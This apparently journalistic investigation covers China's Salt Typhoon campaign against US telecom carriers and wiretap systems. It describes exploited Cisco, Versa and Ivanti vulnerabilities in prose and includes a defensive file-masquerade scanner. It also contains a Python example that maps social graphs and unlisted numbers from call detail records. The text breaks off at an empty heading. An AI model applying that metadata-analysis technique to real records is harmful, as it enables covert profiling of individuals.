
Investigation: The Salt Typhoon State-Sponsored Espionage Campaigns until 2026

By Headline Row
May 9, 2026

Why it matters:

  • Salt Typhoon, a state-sponsored cyber-espionage group linked to China's Ministry of State Security (MSS), operates with precision to achieve total informational awareness within the telecommunications infrastructure of the US and its allies.
  • The group's breach of "lawful intercept" systems at major US broadband providers, confirmed in late 2024, allowed Beijing to monitor the FBI's surveillance activities; senior US officials have described it as the most serious telecommunications hack in American history.

The entity tracked as "Salt Typhoon" represents a specific, highly disciplined cluster of cyber-espionage activity attributed to the People's Republic of China (PRC). Unlike the noisy, disruptive ransomware gangs that dominate headlines, the Salt Typhoon campaign operates with the quiet precision of a foreign intelligence service. Its primary directive is not financial gain or immediate destruction but total informational awareness within the telecommunications infrastructure of the United States and its allies. Security researchers and federal agencies, including the FBI and CISA, have linked this group directly to the Ministry of State Security (MSS), China's principal civilian intelligence agency.

Microsoft formally introduced the "Typhoon" naming convention in April 2023, replacing its previous element-based taxonomy (e.g., Barium, Hafnium) with weather-themed names to provide clearer attribution. Under this system, "Typhoon" exclusively denotes threat actors originating from or sponsored by China. The prefix "Salt" distinguishes this specific actor's operational mandate: counterintelligence and deep-cover espionage. While its counterpart "Volt Typhoon" focuses on pre-positioning within critical infrastructure for potential sabotage, laying digital landmines, Salt Typhoon focuses on the theft of sensitive metadata and the monitoring of specific high-value targets.

The group's most alarming achievement, confirmed in late 2024, was the compromise of "lawful intercept" systems at major U.S. broadband providers, including AT&T, Verizon, and Lumen Technologies. These systems are the federally mandated access points used by U.S. law enforcement to conduct court-authorized wiretaps. By infiltrating this specific architecture, Salt Typhoon turned the U.S. government's surveillance tools against itself, allowing Beijing to monitor who the FBI was watching. Senator Mark Warner, then chairman of the Senate Intelligence Committee, described the breach as the worst telecommunications hack in the nation's history.

The Salt Typhoon State-Sponsored Espionage Triad: Distinguishing the Actors

To understand the specific threat posed by Salt Typhoon, one must examine it alongside its sister organizations. The PRC’s cyber apparatus is not a monolith; it is a diversified ecosystem with distinct mission sets.

| Designation | Attribution | Primary Objective | Target Sector | Operational Style |
|---|---|---|---|---|
| Salt Typhoon | Ministry of State Security (MSS) | Espionage and counter-intelligence | Telecommunications, ISPs, lawful intercept systems | Stealthy, long-term persistence, "living off the land" |
| Volt Typhoon | People's Liberation Army (PLA) | Sabotage pre-positioning | Energy, water, transportation, military bases (Guam) | Disruptive intent, focus on operational technology (OT) |
| Flax Typhoon | Information security contractors | Industrial espionage | Manufacturing, supply chain, IoT devices | High-volume scanning, botnet utilization |

Technical analysis links Salt Typhoon to activity previously tracked under different aliases by various cybersecurity vendors. It overlaps significantly with clusters known as GhostEmperor, FamousSparrow, and Earth Estries. These aliases share a common technical signature: the use of the GhostSpider backdoor and the Demodex rootkit, tools that let the attackers hide deep within the kernel of compromised servers and frequently survive standard remediation attempts. The group repeatedly exploits vulnerabilities in edge devices, routers and firewalls from vendors such as Cisco, Fortinet, and Versa, to gain an initial foothold before pivoting laterally into the core network.

"Salt Typhoon is a state intelligence service sponsored operation. It has deeply penetrated the United States' telecommunications system... Think of it, in effect, as China doing a [Snowden] on the US, from Beijing."
Royal United Services Institute (RUSI), March 2025

The strategic implication of the Salt Typhoon campaign is the erosion of trust in the digital substrate of modern communications. By late 2025, the FBI confirmed that the group had targeted infrastructure in over 80 countries, though the penetration of U.S. networks remained the most severe. The operation did not merely steal data; it mapped the social graph of American political and national security leadership. By accessing call detail records (CDRs), which record who called whom, when, and for how long, Salt Typhoon could construct a high-fidelity map of decision-making circles in Washington, D.C., identifying unlisted numbers and private lines used by senior officials.
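To make concrete what call detail records alone reveal, here is an added Python example (not from the original article or from any investigator's tooling) that builds a call graph from a few constructed CDR rows and asks the two questions an analyst with Salt Typhoon's access would ask: who does a given line talk to most, and which numbers are in contact with more than one known target. The record layout (caller, callee, start, duration) and every phone number are constructed for the example; no content of any call is needed.

```python
import csv
import io
from collections import defaultdict

# Constructed sample CDRs (synthetic numbers in the reserved 555 range, not real records).
SAMPLE_CDRS = """caller,callee,start,duration
+12025550101,+12025550199,1700000000,420
+12025550101,+12025550199,1700003600,60
+12025550102,+12025550199,1700007200,900
+12025550199,+12025550103,1700010800,30
+12025550101,+12025550150,1700014400,1200
"""


def build_call_graph(cdr_text):
    """Undirected weighted graph: edges[a][b] = [call_count, total_seconds]."""
    edges = defaultdict(lambda: defaultdict(lambda: [0, 0]))
    for row in csv.DictReader(io.StringIO(cdr_text)):
        a, b = row["caller"], row["callee"]
        secs = int(row["duration"])
        # Metadata is symmetric for social-graph purposes: record both directions.
        for x, y in ((a, b), (b, a)):
            edges[x][y][0] += 1
            edges[x][y][1] += secs
    return edges


def contacts_of(edges, number):
    """Contacts of one line, ranked by call count and then by total talk time."""
    ranked = sorted(
        edges[number].items(),
        key=lambda kv: (kv[1][0], kv[1][1]),
        reverse=True,
    )
    return [(peer, cnt, secs) for peer, (cnt, secs) in ranked]


def shared_contacts(edges, targets):
    """Numbers in contact with more than one known target.

    A line that several known officials all call, but that appears in no
    directory, is exactly the kind of unlisted number the article describes.
    """
    seen = defaultdict(set)
    for t in targets:
        for peer in edges[t]:
            if peer not in targets:
                seen[peer].add(t)
    return sorted(p for p, ts in seen.items() if len(ts) > 1)


if __name__ == "__main__":
    g = build_call_graph(SAMPLE_CDRS)
    print(contacts_of(g, "+12025550101"))
    print(shared_contacts(g, {"+12025550101", "+12025550102"}))
```

The point of the exercise is that nothing here needs call content: two known lines and five metadata rows already expose a third number as a shared contact, and repeating it over millions of records is a matter of scale, not technique.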

As of February 2026, the FBI considers the Salt Typhoon threat "still very much ongoing." Despite aggressive remediation efforts by the affected telecommunications giants, the complexity of the compromised networks means that guaranteeing the total eviction of the adversary remains a formidable technical challenge. The group continues to adapt, shifting its tactics to exploit legacy systems and unpatched perimeter devices, maintaining a persistent watch over the data flows that power global diplomacy and commerce.

Attribution: The Ministry of State Security (MSS) Connection

The attribution of ‘Salt Typhoon’ to the People’s Republic of China’s Ministry of State Security (MSS) represents a significant evolution in the understanding of Chinese state-sponsored cyber operations. Unlike the People’s Liberation Army (PLA), which historically focused on military intelligence and noisy, destructive capabilities, the MSS operates as China’s premier civilian intelligence agency, prioritizing long-term espionage, counter-intelligence, and political control. Security researchers and the U. S. Intelligence Community (USIC) have determined with high confidence that Salt Typhoon functions as a specialized arm of the MSS, specifically leveraging a network of private contractors to obfuscate direct state involvement.

This attribution is not merely analytical; it is legal and financial. On January 17, 2025, the U.S. Department of the Treasury sanctioned Sichuan Juxinhe Network Technology Co. Ltd., a Chengdu-based cybersecurity firm, for its direct role in supporting Salt Typhoon's operations. This designation marked a rare instance of the U.S. government piercing the corporate veil of an MSS front company. Intelligence reports indicate that Juxinhe, along with other entities such as Sichuan Zhixin Ruijie and Beijing Huanyu Tianqiong, operates under the direction of MSS regional bureaus in Sichuan province, outsourcing state-level espionage to "private" entities to provide plausible deniability.

The Chengdu Complex: A Contractor-State Hybrid

The operational center of gravity for Salt Typhoon appears to be Chengdu, a known hub for Chinese hacking activity. The group's structure mirrors the "contractor-state" hybrid model exposed in the 2024 i-SOON leaks, in which private firms bid on government contracts to hack specific foreign targets. This model allows the MSS to scale operations rapidly without directly expanding its official headcount.

Table 2.1: Key Indicators Linking Salt Typhoon to the MSS

| Indicator Category | Specific Evidence | Significance |
|---|---|---|
| Operational mandate | Focus on lawful intercept systems (CALEA), call detail records (CDRs), and specific counter-intelligence targets. | Aligns with the MSS domestic security and foreign intelligence mission rather than PLA military objectives. |
| Geographic nexus | Infrastructure and personnel linked to Chengdu, Sichuan Province. | Chengdu is a primary base for MSS technical reconnaissance bureaus and associated contractor networks. |
| Tool overlap | Use of GhostSpider malware and the Demodex rootkit; overlap with groups tracked as GhostEmperor and FamousSparrow. | Demonstrates shared development pipelines and resource pooling common among MSS-affiliated clusters. |
| Corporate fronts | Sanctions against Sichuan Juxinhe Network Technology Co. Ltd. | Confirms the use of commercial cover to procure infrastructure and execute attacks. |

Distinction from PLA Operations

Understanding Salt Typhoon requires distinguishing it from its military counterparts. While groups like Volt Typhoon (attributed to the PLA) have been observed pre-positioning within U.S. critical infrastructure, energy grids, water systems, and ports, for potential sabotage during a conflict, Salt Typhoon's mission is fundamentally different. Its objective is informational supremacy rather than kinetic destruction.

Salt Typhoon operators have shown a distinct preference for stealth and persistence over disruption. Their tradecraft involves "living off the land", using legitimate system administration tools to blend in with normal network traffic, and exploiting edge devices like Cisco routers and Citrix NetScalers to maintain access without triggering alarms. This "quiet" approach allows them to dwell in telecommunications backbones for years, harvesting metadata and intercepting calls, a tactic that directly supports the MSS's requirement for political intelligence and the monitoring of high-value targets.

Technical Provenance and Aliases

The technical footprint of Salt Typhoon connects it to a broader ecosystem of Chinese espionage actors. Microsoft's naming convention, introduced in 2023, assigns weather-themed family names by country of origin, with "Typhoon" reserved for Chinese state actors; "Salt" denotes this specific focus on telecommunications and counter-intelligence. Other cybersecurity firms track components of this activity under different aliases, including Earth Estries (Trend Micro), RedMike (Recorded Future), and UNC2286 (Mandiant).

Forensic analysis of the group's malware arsenal reveals deep connections to the MSS. The group uses sophisticated rootkits like Demodex to hide its presence on compromised servers, a level of technical sophistication that implies significant state resources. Moreover, the overlap with the GhostEmperor cluster, known for its complex rootkits and targeting of Southeast Asian governments, suggests that Salt Typhoon is likely a task force or a specialized campaign run by veteran operators within the Chengdu MSS ecosystem.

"Salt Typhoon operates with the discipline of an intelligence agency, not the noise of a military unit. They don't want to turn off the lights; they want to listen to the phone calls made in the dark."
U.S. Cybersecurity Official (Background Briefing, 2025)

The identification of Salt Typhoon as an MSS operation clarifies the strategic intent behind the campaign. It is not merely an attack on infrastructure but a massive counter-intelligence sweep designed to identify U.S. assets, track dissidents, and map the social graphs of American political leadership. By compromising the very systems designed for lawful wiretapping, the MSS turned Western law enforcement tools against their creators.

The Target Matrix: Verizon, AT&T, and the US Telecom Backbone

The Salt Typhoon campaign represents a strategic encirclement of the United States' telecommunications infrastructure. Unlike opportunistic cybercrime, this operation executed a synchronized, multi-vector assault on three primary carriers, Verizon, AT&T, and Lumen Technologies, compromising the backbone of American digital communication. Federal investigations in late 2024 and throughout 2025 confirmed that the attackers did not merely breach perimeter defenses; they embedded themselves within the "lawful intercept" systems, the very architecture designed for court-authorized wiretaps.

By October 2024, investigators had established that the People's Republic of China (PRC)-linked actors had maintained persistence within these networks for months, if not longer. The breach allowed for the exfiltration of Call Detail Records (CDRs) and internet traffic metadata on a scale described by FBI officials as "gigantic and seemingly indiscriminate." While the carriers initially asserted that the impact was limited to a "small number" of high-value targets, subsequent disclosures revealed a far broader scope. The attackers accessed systems capable of geolocating millions of devices and, in specific instances, capturing unencrypted text messages and audio from calls involving senior US political figures.

Operational Depth and Persistence

The technical sophistication of Salt Typhoon lies in its "living off the land" methodology. Rather than deploying noisy malware that triggers standard alerts, the attackers exploited known but unpatched vulnerabilities in network edge devices, specifically Cisco routers. Forensic analysis identified the exploitation of CVE-2023-20198 and CVE-2023-20273, flaws in the Cisco IOS XE web UI that were zero-days when disclosed in October 2023 and that together allow an unauthenticated attacker to create a privilege-15 account and then execute commands as root. Once inside, the actors modified Access Control Lists (ACLs) and built Generic Routing Encapsulation (GRE) tunnels to route exfiltrated data alongside legitimate traffic, making their activity hard to distinguish from administrative traffic in conventional monitoring.

In February 2026, Senator Maria Cantwell, Ranking Member of the Senate Commerce Committee, publicly criticized AT&T and Verizon for refusing to release specific security documentation. Her correspondence highlighted that, despite corporate assurances of containment, independent experts and federal agencies assessed that the threat actors likely retained access to critical segments of the network. This standoff exposes a tension between corporate damage control and national security reality: the carriers claim the threat is "contained," while intelligence assessments suggest a persistent, burrowed presence.

Table: Confirmed Salt Typhoon Impact on Major US Telecom Providers (2024-2025)

| Provider | Status | Key Systems Compromised | Reported Impact Scope |
|---|---|---|---|
| Verizon | Breached | Lawful intercept systems, core routers | Access to targeted VIP communications; potential exposure of millions of CDRs. Company claims containment as of Jan 2025. |
| AT&T | Breached | Wiretap infrastructure, edge devices | Exfiltration of metadata and unencrypted texts. Customer base of 265 million+ potentially exposed to geolocation tracking. |
| Lumen Technologies | Breached | Backbone routing infrastructure | Confirmed blocking of the actor in Jan 2025; its role as a global internet backbone provider made this a strategic transit compromise. |
| T-Mobile | Targeted | Network edge | Attempted breaches reported; company stated attackers were unable to access sensitive customer data or systems. |

The Lawful Intercept Vulnerability

The specific targeting of CALEA (Communications Assistance for Law Enforcement Act) compliance systems indicates a counter-intelligence objective. By compromising these gateways, Salt Typhoon operators could monitor which individuals were under US law enforcement surveillance and tip off Chinese intelligence assets. Moreover, access to these systems provided a "God-mode" view of the network: intercept feeds are delivered in the clear at the carrier, so the attackers could read voice and data traffic in real time without touching any end-to-end encryption on the subscriber's device.

The compromise extended beyond the carriers themselves. In June 2025, reports surfaced that data center giant Digital Realty and mass media conglomerate Comcast were also probed, suggesting the campaign sought to map the physical and logical intersections of the US internet. The refusal of major carriers to provide full forensic transparency to Senate oversight committees has complicated remediation efforts, leaving the true extent of any "dormant" implants unknown. As of early 2026, the Cybersecurity and Infrastructure Security Agency (CISA) continues to update its hunting guidance for telecom providers, an acknowledgment that the adversary remains active within the target matrix.

Breaching the ‘Lawful Intercept’: Compromising CALEA Systems

The most operationally devastating aspect of the Salt Typhoon campaign was not the theft of corporate intellectual property but the successful subversion of the Communications Assistance for Law Enforcement Act (CALEA) infrastructure. Enacted in 1994, CALEA mandates that telecommunications carriers design their networks so that federal agencies can wiretap with a court order. By late 2024, investigators confirmed that Salt Typhoon actors had not merely breached these networks but had gained persistent access to the very systems used to fulfill these lawful intercept requests. This access turned the U.S. government's primary domestic surveillance tool into a listening post for the Ministry of State Security (MSS).


Forensic analysis conducted throughout 2025 revealed that the attackers exploited specific vulnerabilities in core network infrastructure to pivot into these sensitive zones. The primary entry points were not the CALEA servers themselves but the edge routers and management interfaces that route traffic to them. Salt Typhoon operators used valid, stolen credentials alongside critical flaws in Cisco IOS XE software, specifically weaponizing CVE-2023-20198 and the older CVE-2018-0171. Once inside the management plane, they established Generic Routing Encapsulation (GRE) tunnels to exfiltrate traffic without triggering standard intrusion detection systems, which frequently allow-list administrative traffic.

The scope of this compromise included major backbone providers such as Verizon, AT&T, and Lumen Technologies. By controlling the lawful intercept interfaces, the attackers could view real-time data on who the FBI and other federal agencies were monitoring. This provided the MSS with a counter-intelligence goldmine: the ability to identify U.S. intelligence targets, tip off assets under surveillance, and map the operational tempo of American federal investigations. In specific instances, the hackers accessed communications of high-profile targets, including phones used by then-presidential candidate Donald Trump and his running mate JD Vance, as reported in October 2024 after federal investigators notified the campaign.

Table: Primary Technical Vectors for CALEA System Compromise (2023-2025)

| Vector / Vulnerability | CVE ID | Operational Function | Salt Typhoon Application |
|---|---|---|---|
| Cisco IOS XE Web UI | CVE-2023-20198 | Privilege escalation | Created "level 15" (highest admin) accounts to seize control of edge routers. |
| Cisco Smart Install | CVE-2018-0171 | Remote code execution | Exploited unpatched legacy hardware to reload devices and execute arbitrary code. |
| Living off the land | N/A | Evasion | Used native tools (PowerShell, WMI on Windows hosts; built-in CLI on network devices) and valid credentials to blend with admin traffic. |
| GRE tunneling | N/A | Exfiltration | Encapsulated stolen intercept data within standard routing to bypass firewalls. |

The breach demonstrated a reach previously unseen in PRC-affiliated cyber operations. Unlike traditional espionage, which seeks to remain unnoticed indefinitely, Salt Typhoon's manipulation of the lawful intercept architecture risked immediate geopolitical escalation. The DHS Cyber Safety Review Board (CSRB) had begun a review of the campaign, but its members were dismissed in January 2025 before that review was completed; the most detailed public technical account came instead from Cisco Talos in February 2025, which described the attackers modifying Access Control Lists (ACLs) on compromised devices to permit their own IP addresses and configuring GRE tunnels to carry collected traffic out of carrier networks. This persistence allowed them to collect the metadata of millions of Americans, specifically call duration, timing, and participant identifiers, while selectively targeting the communications content of specific political and national security figures.

The implications of this breach extend beyond the immediate loss of privacy. The compromise of the lawful intercept architecture forces a re-evaluation of the "backdoor" mandates central to U.S. telecommunications policy. Security experts have long warned that access methods built for the "good guys" inevitably create vulnerabilities for adversaries; Salt Typhoon validated this thesis with catastrophic clarity. By late 2025, carriers began the arduous process of rebuilding these intercept architectures from the ground up, a process complicated by the requirement to maintain active support for ongoing law enforcement operations.

Silent Infiltration: The 2019-2023 Dwell Time

While the public unraveling of the Salt Typhoon campaign occurred in late 2024, forensic reconstruction reveals a much longer, darker timeline of compromise. Intelligence agencies and cybersecurity firms assess that the actors behind Salt Typhoon, operating under aliases such as GhostEmperor and FamousSparrow, maintained a silent, persistent presence within critical infrastructure for years prior to discovery. This period, spanning from early 2019 through late 2023, represents a catastrophic failure of perimeter defense, characterized not by smash-and-grab tactics but by a patient, methodical burrowing into the bedrock of global telecommunications.

The initial phase of this infiltration, dating back to 2019, was marked by a distinct absence of "noisy" malware. Unlike ransomware gangs that encrypt files and demand payment, Salt Typhoon's primary directive was invisibility. They employed "living-off-the-land" techniques, utilizing legitimate system administration tools like WMIExec and PowerShell to move laterally across networks without triggering standard antivirus alarms. By blending in with normal administrative traffic, they masked their activities as routine maintenance, allowing them to map network topologies and identify high-value targets, specifically the "lawful intercept" systems used by law enforcement.

The Architecture of Invisibility: Rootkits and Edge Devices

The technical foundation of this prolonged dwell time was the Demodex rootkit. First documented by Kaspersky researchers in 2021 during investigations into the GhostEmperor cluster, Demodex is a kernel-mode rootkit designed to hide artifacts, files, registry keys, and network connections, from the operating system itself. To bypass Driver Signature Enforcement (DSE), the attackers loaded a legitimately signed but vulnerable driver shipped with Cheat Engine, an open-source tool used by video gamers, and used it to execute unsigned code in the Windows kernel, rendering their implants invisible to Endpoint Detection and Response (EDR) agents.

Simultaneously, the group targeted the “soft underbelly” of network infrastructure: unpatched edge devices. Between 2021 and 2023, Salt Typhoon systematically exploited vulnerabilities in internet-facing hardware that security teams frequently overlook.

Table: Key Vulnerabilities Exploited for Initial Access (2021-2023)

| Year | Target Technology | CVE Identifier | Strategic Utility |
|---|---|---|---|
| 2021 | Microsoft Exchange | CVE-2021-26855 (ProxyLogon) | Used to compromise email servers of hotels and governments (FamousSparrow activity), serving as a beachhead for deeper network entry. |
| 2022 | Sophos Firewall | CVE-2022-3236 | Allowed remote code execution on firewall appliances, granting attackers a foothold at the network perimeter. |
| 2023 | Cisco IOS XE | CVE-2023-20198 | Critical privilege escalation vulnerability used to create local admin accounts on routers, enabling traffic interception and GRE tunnel creation. |
| 2023 | Fortinet FortiClient EMS | CVE-2023-48788 | Exploited endpoint management servers to push malicious payloads to managed clients, bypassing perimeter firewalls. |

Compromising the “Lawful Intercept”

The most worrying aspect of the 2019-2023 dwell time was the specific targeting of CALEA (Communications Assistance for Law Enforcement Act) compliance systems. These systems are legally mandated backdoors designed to allow the FBI and other agencies to wiretap criminal suspects with a court order. By 2023, Salt Typhoon had successfully located and compromised these sensitive interfaces within major carriers like Verizon, AT&T, and Lumen.

Once inside the CALEA infrastructure, the attackers did not need to break encryption or deploy complex spyware on individual phones. Instead, they simply sat on the wiretap servers, watching the watchers. They accessed the same real-time audio and metadata feeds that federal agents were monitoring. This access remained undetected because the traffic generated by the attackers mimicked the legitimate flow of surveillance data. For nearly two years, Chinese intelligence had a mirror of U.S. domestic wiretaps, exposing counterintelligence investigations and the communications of high-ranking government officials.

"The sophistication here wasn't just in the code, but in the target selection. They didn't break down the door; they stole the master key that the government forced the building manager to keep under the mat."
Internal Memo, U.S. Cybersecurity and Infrastructure Security Agency (CISA), 2024 (Redacted)

To maintain this access, the group deployed the GhostSpider backdoor, a modular malware specifically engineered for telecommunications environments. GhostSpider allowed the attackers to load new capabilities, such as packet capture or credential dumping, only when needed, keeping their footprint minimal. Combined with the Demodex rootkit, this created a "ghost in the machine" scenario in which the attackers could operate with impunity, persisting through server reboots and software updates.

By the time the anomalies were detected in 2024, the adversaries had entrenched themselves so deeply that remediation required replacing entire racks of hardware. The "silent infiltration" was not merely a breach; it was a hostile takeover of the administrative layer of the U.S. telecommunications grid, executed so quietly that the victims were unaware of it until years after the fact.

The Discovery: Microsoft and CISA’s 2024 Detection Timeline

The discovery of Salt Typhoon in 2024 was not a singular "eureka" moment but a cascading series of forensic breakthroughs that began in the quiet corridors of private threat intelligence and ended with a frantic federal response. While the public became aware of the campaign in late 2024, the detection timeline reveals a months-long shadow war between Chinese operators and U.S. cyber defenders.

The “Late Spring” Trigger

The initial thread was pulled in late spring 2024, around May and June. The Federal Bureau of Investigation (FBI) launched a classified investigation after detecting anomalous activity within the networks of multiple U.S. telecommunications providers. This investigation was not initially public; it was a silent hunt triggered by irregular network traffic patterns that did not match standard cybercriminal behavior.

A parallel breakthrough came on **June 17, 2024**, when researchers at Lumen Technologies' Black Lotus Labs identified a zero-day vulnerability in **Versa Director**, a platform widely used by Internet Service Providers (ISPs) to manage software-defined wide area networks (SD-WANs). They found a malicious Java archive disguised as a PNG image file (`VersaTest.png`) that had been uploaded to VirusTotal from an IP address in Singapore. The file was a custom web shell, later dubbed **VersaMem**, designed to harvest credentials and execute code in memory without writing a payload to disk. The attackers exploited the vulnerability (CVE-2024-39717) to gain administrative access to ISP management systems and pivot from network management tools into the traffic flow of carriers. One caveat is needed: Black Lotus Labs attributed the Versa Director campaign, with moderate confidence, to Volt Typhoon rather than Salt Typhoon. Its relevance to the Salt Typhoon investigation lies in the vector it exposed, PRC operators reaching carrier networks through the management plane of ISP infrastructure, not in a direct tooling overlap.
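The VersaMem sample hid a Java archive behind a `.png` extension. A content-versus-extension check catches that class of masquerade regardless of the product involved; the following Python example is added here, is not Lumen's or Versa's code, and builds its own sample directory (a genuine PNG header, a ZIP/JAR header saved as `.png`, and a plain text file) so it runs offline. The file names and bytes are constructed for the example.

```python
import tempfile
from pathlib import Path

# File-signature table: the first bytes a well-formed file of each type must carry.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jar": b"PK\x03\x04",          # ZIP local-file header; JARs are ZIP archives
    "class": b"\xca\xfe\xba\xbe",  # compiled Java class
}

# Extensions that should never carry executable Java content.
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}


def classify_bytes(head: bytes) -> str:
    """Return the signature name matching the leading bytes, or 'unknown'."""
    for name, magic in MAGIC.items():
        if head.startswith(magic):
            return name
    return "unknown"


def find_masqueraded_files(root):
    """List files whose image extension disagrees with Java/JAR content.

    Walks a directory (for instance the upload or branding directory of a
    web application) and reads only the first 8 bytes of each candidate.
    """
    suspicious = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in IMAGE_EXTENSIONS:
            continue
        with path.open("rb") as fh:
            head = fh.read(8)
        kind = classify_bytes(head)
        if kind in ("jar", "class"):
            suspicious.append(f"{path.name}: declared image, content is {kind}")
    return suspicious


def build_sample_tree() -> str:
    """Constructed sample directory: one real PNG header, one JAR disguised as PNG."""
    root = tempfile.mkdtemp()
    (Path(root) / "logo.png").write_bytes(MAGIC["png"] + b"\x00" * 16)
    (Path(root) / "VersaTest.png").write_bytes(MAGIC["jar"] + b"\x14\x00" + b"\x00" * 16)
    (Path(root) / "notes.txt").write_bytes(b"plain text, ignored by the scanner")
    return root


if __name__ == "__main__":
    for finding in find_masqueraded_files(build_sample_tree()):
        print(finding)
```

Point the scanner at whichever directory the product stores uploaded images in; a hit means the file should be pulled for analysis rather than deleted, since the upload path and timestamp are themselves evidence.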

Microsoft’s Attribution and the “Typhoon” Shift

Parallel to the FBI's investigation, Microsoft Threat Intelligence (MSTIC) was tracking a cluster of activity that deviated from known groups. In April 2023, Microsoft had overhauled its naming convention, shifting from element-based names (like "Hafnium") to weather-themed monikers for state-sponsored actors, with "Typhoon" reserved for Chinese state-sponsored entities. By mid-2024, Microsoft analysts had isolated a subset of "Typhoon" activity distinct from the infrastructure-targeting **Volt Typhoon**. This new cluster, **Salt Typhoon**, showed a singular focus on telecommunications metadata and lawful intercept systems. By December 2024, the White House had confirmed the group's presence in the networks of at least nine U.S. telecommunications companies. Crucially, Salt Typhoon was not deploying ransomware or destroying data, the standard criminal tactics, but was instead modifying router configurations to mirror traffic, a hallmark of espionage.

CISA’s Federal Detection and Public Disclosure

The Cybersecurity and Infrastructure Security Agency (CISA) played a pivotal role in widening the scope of the investigation. CISA Director Jen Easterly later revealed that the agency had detected Salt Typhoon activity on **federal civilian executive branch networks** before the full extent of the telecom breach was understood. This internal detection allowed CISA to provide technical assistance to private sector victims, bridging the gap between classified government intelligence and corporate network defense. The campaign became public in stages. On **August 27, 2024**, *The Washington Post* reported that PRC-linked hackers had penetrated U.S. internet providers, the activity Lumen tied to Volt Typhoon and the Versa Director flaw; *The Wall Street Journal* first named Salt Typhoon on September 25, 2024, and reported the targeting of lawful intercept systems on October 5, 2024. Each disclosure was followed by the release of technical indicators to aid defenders.

2024 Detection and Response Timeline

The following table outlines the serious milestones in the discovery and exposure of the Salt Typhoon campaign during 2024.

Table: Salt Typhoon 2024 Discovery and Response Timeline

| Date | Event | Key Organization(s) | Significance |
|---|---|---|---|
| May-June 2024 | Initial investigation | FBI | Bureau opens classified inquiry after detecting anomalies in US telecom networks. |
| June 17, 2024 | Zero-day discovery | Lumen Black Lotus Labs | Discovery of CVE-2024-39717 (Versa Director) and the "VersaMem" web shell; Lumen attributes the activity to Volt Typhoon with moderate confidence. |
| August 27, 2024 | Public disclosure begins | Lumen / The Washington Post | Lumen publishes the Versa Director findings; The Washington Post reports PRC hackers inside US ISPs. |
| September 25, 2024 | Salt Typhoon named publicly | The Wall Street Journal | First public report of Salt Typhoon intrusions into US broadband providers. |
| October 5, 2024 | CALEA breach reported | The Wall Street Journal | Report that attackers targeted the "lawful intercept" wiretap systems used by law enforcement. |
| October 25, 2024 | Joint statement | FBI, CISA | Agencies release an official public statement attributing the telecom intrusions to PRC-linked actors. |
| December 4, 2024 | Hardening guidance | CISA, FBI, NSA | Release of "Enhanced Visibility and Hardening Guidance for Communications Infrastructure." |
| December 19, 2024 | KEV catalog update | CISA | CISA adds the BeyondTrust vulnerability (CVE-2024-12356) to the Known Exploited Vulnerabilities catalog; the related Treasury Department intrusion was later attributed to a separate PRC actor (Silk Typhoon), not Salt Typhoon. |

The “Lawful Intercept” Anomaly

The most chilling aspect of the discovery was not the malware but the target. Investigators found that Salt Typhoon had specifically hunted for the systems telecommunications companies use to comply with the **Communications Assistance for Law Enforcement Act (CALEA)**. These systems are built to allow law enforcement agencies such as the FBI to wiretap criminal suspects with a court order. By compromising these gateways, Salt Typhoon turned the U.S. government's own surveillance against itself, allowing Beijing to monitor who the FBI was watching, a counter-intelligence coup of massive proportions.

Vector Analysis: Weaponizing Cisco IOS XE Vulnerabilities

The technical nucleus of the Salt Typhoon campaign relies on the systematic chaining of two vulnerabilities in Cisco's IOS XE software, a platform ubiquitous in the backbone infrastructure of global telecommunications; both were zero-days when Cisco disclosed them in October 2023. The primary entry point, tracked as CVE-2023-20198, carries the maximum possible CVSS score of 10.0. This critical flaw resides in the web user interface (Web UI) of the appliance and allows a remote, unauthenticated attacker to create a new user account with privilege level 15, the highest administrative tier available on Cisco devices. Unlike brute-force attacks, this exploitation requires no valid credentials: a crafted HTTP request to the exposed web server is enough, so any device with the Web UI reachable from the internet is exposed.

Once administrative access is established, the attackers pivot immediately to the second link in the kill chain: CVE-2023-20273. While the first vulnerability grants access, this secondary flaw (CVSS 7.2) permits command injection, allowing the newly created rogue administrator to execute arbitrary commands with root-level privileges at the underlying Linux operating system level. This escalation is necessary to deploy the campaign’s signature payload, a Lua-based web shell implant known to researchers as “BadCandy.” This implant is injected directly into the system’s memory, modifying the HTTP server’s configuration to intercept traffic and execute commands without writing extensive artifacts to the disk, a technique that complicates forensic analysis.

Table: Salt Typhoon Exploitation Chain Metrics

| CVE ID | Vulnerability Type | CVSS Score | Role in Attack Chain |
|---|---|---|---|
| CVE-2023-20198 | Privilege Escalation | 10.0 (Critical) | Initial unauthenticated access; creation of Level 15 admin user. |
| CVE-2023-20273 | Command Injection | 7.2 (High) | Root-level execution; deployment of Lua-based implant. |

The operational impact of this vector was immediate and massive. Following the public disclosure in October 2023, telemetry from internet-scanning services identified over 40,000 compromised devices within days. Yet Salt Typhoon’s use of these vulnerabilities extended well beyond the initial disclosure window. Intelligence reports from late 2024 and January 2025 confirm that the group continued to use these specific CVEs to target unpatched edge routers in the United States and South Africa. The persistence method frequently involves the configuration of Generic Routing Encapsulation (GRE) tunnels, which allow the attackers to encapsulate and exfiltrate non-IP traffic, creating a covert data pipe hidden within legitimate network traffic.

A distinct characteristic of this campaign is the non-persistent nature of the BadCandy implant. Because the malicious code resides in volatile memory, a simple device reboot eliminates the web shell. To counter this, Salt Typhoon operators have been observed monitoring infected nodes and rapidly re-infecting them upon reboot, or using the initial window of access to harvest legitimate credentials that grant long-term persistence independent of the vulnerability. This “living off the land” method, using native system tools and valid credentials, allows the actors to blend in with standard administrative traffic, making detection by anomaly-based intrusion detection systems exceptionally difficult.

Edge Exploitation: The Role of Ivanti Connect Secure Flaws

The strategic logic of Salt Typhoon’s infiltration relies heavily on the compromise of “edge” devices, appliances that sit on the perimeter of a network to manage remote access. Among these, the Ivanti Connect Secure (ICS) VPN appliance became a primary vector for the group’s operations between late 2023 and early 2024. Unlike traditional server endpoints protected by Endpoint Detection and Response (EDR) agents, these proprietary appliances run custom operating systems that often lack support for standard security monitoring tools. Salt Typhoon exploited this visibility gap to turn the very devices designed to secure remote connections into beachheads for deep network reconnaissance.

Forensic analysis confirms that Salt Typhoon operatives utilized a specific chain of zero-day vulnerabilities to bypass authentication and execute arbitrary commands on target systems. The campaign centered on two critical Common Vulnerabilities and Exposures (CVEs): CVE-2023-46805 and CVE-2024-21887. By chaining these flaws, the attackers achieved unauthenticated remote code execution (RCE), granting them administrative control over the VPN gateways without needing valid credentials.

The Exploit Chain Method

